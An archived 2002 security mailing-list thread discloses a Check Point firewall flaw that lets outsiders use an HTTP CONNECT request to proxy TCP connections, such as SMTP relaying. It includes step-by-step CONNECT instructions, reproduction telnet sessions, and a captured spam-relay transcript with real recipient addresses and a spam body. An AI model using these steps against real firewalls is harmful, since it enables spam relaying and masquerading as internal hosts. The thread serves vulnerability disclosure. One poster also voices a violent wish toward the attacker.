William, I was only partially able to reproduce your issue and it was only to destinations and services that my firewall would have already allowed anyway. root@mojo:~# telnet www.xxx.com 80 Trying 19x.1x8.xx6.1x3... Connected to www.xxx.com. Escape character is '^]'. CONNECT 1x8.1x6.xx1.1x6:25 / HTTP/1.0 HTTP/1.0 200 220 ESMTP helo firewall 250 mail.xxx.com Hello [1x8.1x6.xx1.1x5], pleased to meet you quit 221 2.0.0 mail.xxx.com closing connection Connection closed by foreign host. Any other connection attempt to a IP:port that was not normally allowed by policy was denied. root@mojo:~# telnet www.xxx.com 80 Trying 19x.1x8.xx6.1x3... Connected to www.xxx.com. Escape character is '^]'. CONNECT 1x8.1x6.xx1.1x6:22 / HTTP/1.0 HTTP/1.0 200 Pragma: no-cache Cache-Control: no-cache Content-Type: text/html Content-Length: 85 <TITLE>Error</TITLE> <BODY> <H1>Error</H1> FW-1 at xxxexmfwx: Access denied.</BODY> Connection closed by foreign host. While it is a little startling that Checkpoint would allow this kind of connection, I was not able to actually connect to any place that I would not normally be able to connect from the internet. I do not allow http tunneling. We are running the http security server strictly to block the nimda and code red attacks. I am running 4.1 Sp5 Regards Dennis ----- Original Message ----- From: "William D. Colburn (aka Schlake)" <wcolburn@nmt.edu> To: <bugtraq@securityfocus.com>; "Dan Lunceford" <dan@nmt.edu>; "Ryan" <ryan@nmt.edu>; <support@aquilagroup.com> Cc: "Madeline Navarrette" <mnavarre@ts.checkpoint.com> Sent: Monday, February 18, 2002 6:09 PM Subject: UPDATE: [wcolburn@nmt.edu: SMTP relay through checkpoint firewall] > Checkpoint bounced my mail because I'm not a checkpoint customer, so I > contacted customer advocacy and resent it to a different address (this > message is copied to her as well). I was told that the issue would be > propogated to an appropriate person. > > Please drop the old message and continue to hold this message until > Checkpoint responds. > > I have a few updates to this issue that I have learned since I crafted > the original message. > > I only need to give the "CONNECT" line, and nothing else. After the > second newline there is a pause and then the TCP stream is open. I seem > to be able to open any port on any machine I want *except* port 80. I > was able to telnet in to UNIX login with the firewall appearing as the > remote host. The initial machine I use (inside the firewall) does not > need to actually exist, I merely have to attempt to connect to an IP > address "inside" on port 80. > > This whole give anyone outside a firewall the ability to masquerade on > any TCP service (except WWW) as a machine inside the domain of the > firewall. As far as I can tell there are no logs on this, and it is > hard to detect on the firewall. I found it by doing a tcpdump of all > packets and gradually narrowing down my filters until I was able to > "catch" an entire transaction. > > ----- Forwarded message from "William D. Colburn (aka Schlake)" <wcolburn@nmt.edu> ----- > > Step one: telnet to a machine behind the checkpoint firewall on port 80 > > Step two: Type the following: > >CONNECT mailserver.somecompany.com:25 / HTTP/1.0 > >User-Agent: eeep > >Cache-Control: private,no-cache > >Pragma: no-cache > > > > Step three: wait a moment for your SMTP banner to pop up. > > I will attach an actual attack I caputured with tcpdump and ethereal. > The file is the result of an ethereal "Follow TCP stream". > > I hate the person who did this to me and I hope they die a terrible > death. > > -- > William Colburn, "Sysprog" <wcolburn@nmt.edu> > Computer Center, New Mexico Institute of Mining and Technology > http://www.nmt.edu/tcc/ http://www.nmt.edu/~wcolburn > > --AqsLC8rIMeq19msA > Content-Type: text/plain; charset=us-ascii > Content-Disposition: attachment; filename=checkpoint > > From root@netpeep.nmt.edu Mon Feb 18 16:05:43 2002 > Return-Path: <root@netpeep.nmt.edu> > Received: from netpeep.nmt.edu (netpeep.nmt.edu [129.138.250.10]) > by mailhost.nmt.edu (8.12.2/8.12.2) with ESMTP id g1IN5hF0009872 > for <schlake@nmt.edu>; Mon, 18 Feb 2002 16:05:43 -0700 > Received: from netpeep.nmt.edu (localhost [127.0.0.1]) > by netpeep.nmt.edu (8.12.2/8.12.2) with ESMTP id g1IN5hnA020585 > for <schlake@nmt.edu>; Mon, 18 Feb 2002 16:05:43 -0700 > Received: (from root@localhost) > by netpeep.nmt.edu (8.12.2/8.12.1/Submit) id g1IN5h8w020584 > for schlake@nmt.edu; Mon, 18 Feb 2002 16:05:43 -0700 > Date: Mon, 18 Feb 2002 16:05:43 -0700 > From: root <root@netpeep.nmt.edu> > Message-Id: <200202182305.g1IN5h8w020584@netpeep.nmt.edu> > To: schlake@nmt.edu > Content-Length: 3580 > Lines: 112 > > CONNECT mail2.freeuk.net:25 / HTTP/1.0 > User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) > Cache-Control: private,no-cache > Pragma: no-cache > > HELO hotmail.com > MAIL FROM: <pheros680506@hotmail.com> > RCPT TO: <renewinter@freeuk.com> > RCPT TO: <renewu@freeuk.com> > RCPT TO: <renfah@freeuk.com> > RCPT TO: <renfi11160@freeuk.com> > RCPT TO: <renfield13@freeuk.com> > RCPT TO: <renfield20@freeuk.com> > RCPT TO: <renfield94@freeuk.com> > RCPT TO: <renfrew@freeuk.com> > RCPT TO: <renfro33@freeuk.com> > RCPT TO: <reng3@freeuk.com> > RCPT TO: <renga@freeuk.com> > RCPT TO: <rengel293@freeuk.com> > RCPT TO: <rengel7495@freeuk.com> > RCPT TO: <rengelh946@freeuk.com> > RCPT TO: <rengers@freeuk.com> > RCPT TO: <rengised@freeuk.com> > RCPT TO: <rengl21068@freeuk.com> > RCPT TO: <rengl29048@freeuk.com> > RCPT TO: <rengl78818@freeuk.com> > DATA > Reply-To: <pheros680506@hotmail.com> > Message-ID: <004b71e11dcb$7144b8d2$6ac55bc3@mlpqff> > From: <pheros680506@hotmail.com> > To: <renewinter@freeuk.com> > Cc: <renewu@freeuk.com>, > <renfah@freeuk.com>, > <renfi11160@freeuk.com>, > <renfield13@freeuk.com>, > <renfield20@freeuk.com>, > <renfield94@freeuk.com>, > <renfrew@freeuk.com>, > <renfro33@freeuk.com>, > <reng3@freeuk.com>, > <renga@freeuk.com>, > <rengel293@freeuk.com>, > <rengel7495@freeuk.com>, > <rengelh946@freeuk.com>, > <rengers@freeuk.com>, > <rengised@freeuk.com>, > <rengl21068@freeuk.com>, > <rengl29048@freeuk.com>, > <rengl78818@freeuk.com> > Subject: A new fragrance (3437AlLf5-384bbsO4815hPeX5-01@27) > MiME-Version: 1.0 > Content-Type: text/html; charset="iso-8859-1" > X-Priority: 3 (Normal) > X-MSMail-Priority: Normal > X-Mailer: > Importance: Normal > > Hi ! > > <HTML> > <head><title>Pheros attraction</title> > </head> > <BODY TEXT="#000000" LINK="#000000" VLINK="#000000" BGCOLOR="#7777FF"> > <CENTER> > <TABLE WIDTH="650"> > <TR> > <TD COLSPAN="2"> > <FONT FACE="VERDANA, ARIAL">Notice: I have paid to be able to send you this e-mail. I do not intend to > cause you harm, fill up your mailbox or bother you needlessly. I am only > trying to reach those who are not as secure in their financial future as I > was when I first started looking for a way to earn money online. To be > removed, please go to the end of this e-mail. Please forgive me if you > receive this advertisement twice.<BR><BR> > </FONT> > </TD> > </TR> > <TR> > <TD VALIGN="TOP"> > <FONT FACE="VERDANA, ARIAL"> > Pheros is a lovely fragrance with a touch of human > pheromones, packaged in a exclusive crafted box. > Pheros is a foolproof tool of seduction, the scent and the > pheromones together make a foolproof combination. > No one can resist the wearer of this mysterious fragrance! > Pheros combines high tech science with the well-known > function of the scent of a luxorious perfume. <BR> The price is 19.95 USD/Bottle, including P&P! Payment is done via PayPal! > <BR>To order, klick the Paypal logo <A HREF="https://www.paypal.com/xclick/business=pheros3%40hotmail.com&item_name =Pheros&item_number=PherInt001&amount=19.95" TARGET="new"><IMG SRC="http://images.paypal.com/images/x-click-but02.gif"; border="0"></A> > <BR> > > </FONT> > </TD> > <TD> > <IMG SRC="http://pheros.freehosting.net/images/Mailbilden.jpg"; border="2"> > </TD> > </TR> > <TR> > <TD COLSPAN="2"> > <BR> > <FONT FACE="Verdana, Arial"> > To be removed from this mailing list, please reply to this message with the subjct "remove". > You will be BLOCKED from all mail from this site and your request will take effect within 24 hours. > </FONT> > </TD> > </TR> > </TABLE> > </CENTER> > </BODY> > </HTML> > [2901sDxs3-632TivA4099LrRl6-563cNjc6630cqwk8-434lwqh9794mwMr2-514eMAy1216cuz @71] > > . > QUIT > > > --AqsLC8rIMeq19msA-- > > ----- End forwarded message ----- > > -- > William Colburn, "Sysprog" <wcolburn@nmt.edu> > Computer Center, New Mexico Institute of Mining and Technology > http://www.nmt.edu/tcc/ http://www.nmt.edu/~wcolburn >
![http://images.paypal.com/images/x-click-but02.gif"](http://images.paypal.com/images/x-click-but02.gif"){kind=link}
![http://pheros.freehosting.net/images/Mailbilden.jpg"](http://pheros.freehosting.net/images/Mailbilden.jpg"){kind=link}
